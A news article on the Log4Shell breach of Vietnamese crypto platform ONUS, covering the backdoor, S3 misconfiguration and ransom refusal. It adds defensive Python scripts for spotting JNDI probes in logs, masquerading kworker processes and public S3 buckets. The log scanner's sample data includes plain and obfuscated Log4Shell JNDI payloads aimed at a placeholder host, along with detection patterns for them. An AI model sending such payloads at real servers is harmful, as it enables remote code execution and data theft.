FinTech Company Impacted by Log4j Says No to Paying the Ransom
A Version of Log4j Vulnerable to the Well-Known Log4Shell Flaw Allowed Hackers to Breach the Firm’s System.
A cyberattack has recently impacted ONUS, one of the biggest Vietnamese crypto trading platforms. Hackers targeted the company’s payment system where a vulnerable version of Log4j was running.
Extortion followed the cyberattack: the hackers reportedly demanded a ransom of $5 million from the firm, threatening to make customer data public otherwise.
According to the BleepingComputer publication, the company refused to pay, so the information related to almost 2 million customers of ONUS ended up for sale on forums.
More Details Regarding the ONUS Incident
A proof-of-concept (PoC) exploit for the Log4j vulnerability tracked as CVE-2021-44228, which is currently making headlines, appeared on GitHub around December 9. From then on, threat actors have seen an opportunity to exploit it on a massive scale.
One of their targets was an ONUS Cyclos server that ran a version of Log4j vulnerable to Log4Shell. The hackers successfully exploited it between December 11 and December 13. They also planted backdoors to retain their access.
On December 13, a Cyclos advisory came out that reportedly informed ONUS that its systems had to be patched. However, even though the Cyclos instance was patched, the action came too late: during the exposure window, the threat actors had had time to exfiltrate the sensitive databases they were after.
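As an added illustration of how defenders look for the kind of exploitation attempts described above (this is example code, not from the article, ONUS or CyStack), the following Python script scans web-server access log lines for Log4Shell-style JNDI lookup strings. The log lines are constructed and use documentation IP ranges; the normalisation step folds the lower/upper and default-value lookups that Log4j evaluates before it sees the jndi: scheme, which is why a plain substring match on `${jndi:` misses some attempts.

```python
"""Scan access-log lines for Log4Shell (CVE-2021-44228) exploitation attempts.

Added example; not code from the article, ONUS or CyStack. SAMPLE_LOG is
constructed for illustration and uses documentation IP ranges.
"""
import re
from typing import List, Tuple

# Log4j resolves these wrappers before it ever sees the jndi: scheme, so a
# detector has to fold them first. Case mapping is irrelevant here because the
# final match is case-insensitive:  ${lower:J} -> J, ${::-j} -> j.
_WRAPPER = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # group 1: case-mapping lookups
    r"|\$\{:*-([^${}]*)\}",              # group 2: empty lookup with a default value
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse nested wrapper lookups from the inside out until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _WRAPPER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a jndi: lookup once wrappers are folded away."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalised line) for every suspicious line."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed sample in common/combined log format; not real ONUS traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [11/Dec/2021:10:02:12 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [11/Dec/2021:10:03:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Run against a real access log by replacing `SAMPLE_LOG` with the file's lines; lines 2 and 3 of the sample are flagged, line 4 (a harmless `${date:...}` lookup) is not. A hit only tells you a probe arrived, not whether the target was vulnerable, so pair it with an inventory of which hosts still run an unpatched Log4j.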
According to BleepingComputer, almost 2 million customer records were stored in those databases, including E-KYC (electronic Know Your Customer) information along with hashed passwords and personal data.
It’s worth mentioning that the Log4Shell vulnerability was located on a sandbox server used “for programming purposes only”. But because of a misconfiguration in the system, hackers could gain access to other storage locations, such as Amazon S3 buckets where production data was stored.
What reportedly happened next was that the threat actors demanded that ONUS pay a ransom of $5 million, which the company refused to do; instead, it decided to inform customers about the cyberattack in a private Facebook group.
Chien Tran, the CEO of ONUS, declared that:
As a company that puts safety first, we are committed to providing our customers with transparency and integrity in business operations. (…) That is why, after careful consideration, the right thing we need to do now is to inform the entire ONUS community about this incident.
What Data Was Exfiltrated by Hackers?
According to an announcement published by ONUS on the topic, the hackers managed to retrieve the following customer data from the fintech company:
- Name, phone number, and email address;
- KYC data (procedures used by fintech enterprises to collect identification documents and customer proofs along with a “video selfie” for an automated check);
- Encrypted history;
- Transaction history;
- Other encrypted data.
The Misconfiguration in the Amazon S3 Buckets
Besides Log4j, which gave the threat actors their initial entry, there was another issue: ONUS’ Amazon S3 buckets had improper access control.
During monitoring, CyStack – ONUS’s security partner – detected and reported a cyber attack on the ONUS system to us. The hacker took advantage of a vulnerability in a set of libraries on the ONUS system to get into the sandbox server (for programming purposes only). However, due to a configuration problem, this server contains information that gave bad guys access to our data storage system (Amazon S3) and stole some essential data.
CyStack started an investigation into the incident and published a report with details about the cyberattack and the backdoor the hackers managed to plant on the impacted system.
Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information. (…) To facilitate access, the attackers downloaded and ran a backdoor on the server. This backdoor was named kworker for the purpose of disguising as the Linux operating system’s kworker service. (…) The kworker backdoor obtained was written in Golang 1.17.2 and built for Linux x64. It was used as a tunnel connecting the C&C server and the compromised server via SSH protocol (a wise way to avoid detection!).
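The backdoor described above relied on a name that blends in with the kernel's own worker threads. As an added example (not code from the article, ONUS or CyStack), the Python script below shows the host check a defender can run to catch that trick: genuine kernel threads are children of kthreadd (PID 2) and have no command line, which ps renders as the name in square brackets, so a binary that merely calls itself "kworker" fails one or both tests. The process listing is constructed in the format of `ps -eo pid,ppid,comm,args --no-headers`.

```python
"""Spot user-space processes masquerading as Linux kernel threads.

Added example; not code from the article, ONUS or CyStack. SAMPLE_PS is a
constructed excerpt in the format of `ps -eo pid,ppid,comm,args --no-headers`.
"""
import re
from dataclasses import dataclass
from typing import List

# Name prefixes that legitimately belong only to kernel threads.
_KERNEL_NAMES = re.compile(
    r"^(kworker|ksoftirqd|kthreadd|migration|rcu_|kswapd|kcompactd|cpuhp|watchdog)"
)


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    args: str


def parse_ps(output: str) -> List[Proc]:
    """Parse `ps -eo pid,ppid,comm,args` lines into Proc records."""
    procs = []
    for line in output.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        args = parts[3] if len(parts) == 4 else ""
        procs.append(Proc(int(parts[0]), int(parts[1]), parts[2], args))
    return procs


def is_genuine_kernel_thread(p: Proc) -> bool:
    """Both conditions a real kernel thread satisfies and a user process cannot fully fake."""
    # kthreadd itself (PID 2) is parented by PID 0; every other kernel thread by PID 2.
    parented_by_kernel = p.ppid == 2 or (p.pid == 2 and p.ppid == 0)
    # A kernel thread has no argv, so ps prints "[comm]". A user process can fake
    # that string through argv[0] but cannot choose its parent, hence both checks.
    bracketed = p.args.startswith("[") and p.args.endswith("]")
    return parented_by_kernel and bracketed


def find_masquerades(procs: List[Proc]) -> List[Proc]:
    """Processes carrying a kernel-thread name that are not real kernel threads."""
    return [p for p in procs if _KERNEL_NAMES.match(p.comm) and not is_genuine_kernel_thread(p)]


# Constructed listing: two real kernel threads, sshd, and two impostors.
SAMPLE_PS = """\
    2     0 kthreadd        [kthreadd]
   15     2 kworker/0:1     [kworker/0:1]
  812     1 sshd            /usr/sbin/sshd -D
 1337     1 kworker         /tmp/kworker
 2048   812 sshd            sshd: deploy [priv]
 2101  2048 kworker         [kworker/1:2]
"""

if __name__ == "__main__":
    for p in find_masquerades(parse_ps(SAMPLE_PS)):
        print(f"suspicious: pid={p.pid} ppid={p.ppid} comm={p.comm} args={p.args!r}")
```

On a live host, feed the output of `ps -eo pid,ppid,comm,args --no-headers` into `parse_ps`; reading `/proc/<pid>/status` and `/proc/<pid>/exe` directly gives the same signals (a kernel thread has no readable `exe` link). The two impostors in the sample are caught for different reasons: PID 1337 has a real command line, PID 2101 fakes the bracketed name but is a child of an SSH session rather than of kthreadd.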
Not Paying the Ransom Led to Data Exposure
As per BleepingComputer, since the company refused to pay the ransom demanded by the hackers, by December 25 the customer data had ended up for sale on a data breach marketplace.
The hackers claimed to be in possession of copies of no fewer than 395 ONUS database tables containing personal data and hashed passwords.
CyStack recommended that ONUS patch Log4j, make sure the exposed AWS credentials are deactivated, configure AWS access permissions correctly, and block public access to critical S3 buckets.
ONUS also added that its assets were not impacted and that the company’s team has been working with security experts to discover and fix vulnerabilities. In addition, ONUS Custody, the company’s asset management and storage system, was upgraded. In case of any loss of property, the company assures that the issue can be addressed through the ONUS Protection Fund.
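Both the improper access control on the S3 buckets mentioned earlier and the recommendation to block public access come down to two settings an auditor can check: the bucket policy and the account's Public Access Block. As an added example (not code from the article, ONUS, CyStack or AWS), the Python script below evaluates a constructed weak configuration next to a hardened one, offline. The bucket name, account id and role ARN are placeholders; the same functions can be run on the JSON returned by `aws s3api get-bucket-policy` and `aws s3api get-public-access-block`.

```python
"""Offline audit of an S3 bucket's policy and Public Access Block settings.

Added example; not code from the article, ONUS, CyStack or AWS. The policy
documents below are constructed: WEAK_POLICY grants anonymous read, the
hardened one grants a single named role (placeholder account id and role name).
"""
from typing import Any, Dict, List

PAB_SETTINGS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")

WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-backups/*"},
    ],
}
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "BackupWriterOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/backup-writer"},  # placeholder
         "Action": ["s3:PutObject", "s3:GetObject"],
         "Resource": "arn:aws:s3:::example-backups/*"},
    ],
}
WEAK_PAB = {k: False for k in PAB_SETTINGS}       # nothing blocked
HARDENED_PAB = {k: True for k in PAB_SETTINGS}    # all four protections on


def _is_wildcard_principal(principal: Any) -> bool:
    """True for "*" or any {"AWS": "*"} / {"AWS": [..., "*"]} form."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        for value in principal.values():
            values = value if isinstance(value, list) else [value]
            if "*" in values:
                return True
    return False


def public_statements(policy: Dict) -> List[str]:
    """Sids of Allow statements that grant access to anyone (anonymous or any AWS account)."""
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):          # a single statement may be given without a list
        stmts = [stmts]
    findings = []
    for i, stmt in enumerate(stmts):
        if stmt.get("Effect") == "Allow" and _is_wildcard_principal(stmt.get("Principal")):
            findings.append(stmt.get("Sid", f"Statement{i}"))
    return findings


def public_access_block_gaps(pab: Dict) -> List[str]:
    """Public Access Block settings that are missing or switched off."""
    return [k for k in PAB_SETTINGS if not pab.get(k, False)]


def audit_bucket(name: str, policy: Dict, pab: Dict) -> Dict:
    """Combine both checks into one finding record for a bucket."""
    return {
        "bucket": name,
        "public_statements": public_statements(policy),
        "pab_gaps": public_access_block_gaps(pab),
    }


if __name__ == "__main__":
    print("weak:     ", audit_bucket("example-backups", WEAK_POLICY, WEAK_PAB))
    print("hardened: ", audit_bucket("example-backups", HARDENED_POLICY, HARDENED_PAB))
```

A wildcard principal with a `Condition` block may be narrower than it looks, so the script reports it rather than silently accepting it; whoever reviews the finding decides whether the condition is tight enough. Turning on all four Public Access Block settings is the belt-and-braces control, because it overrides a public bucket policy or ACL even if one is added later by mistake.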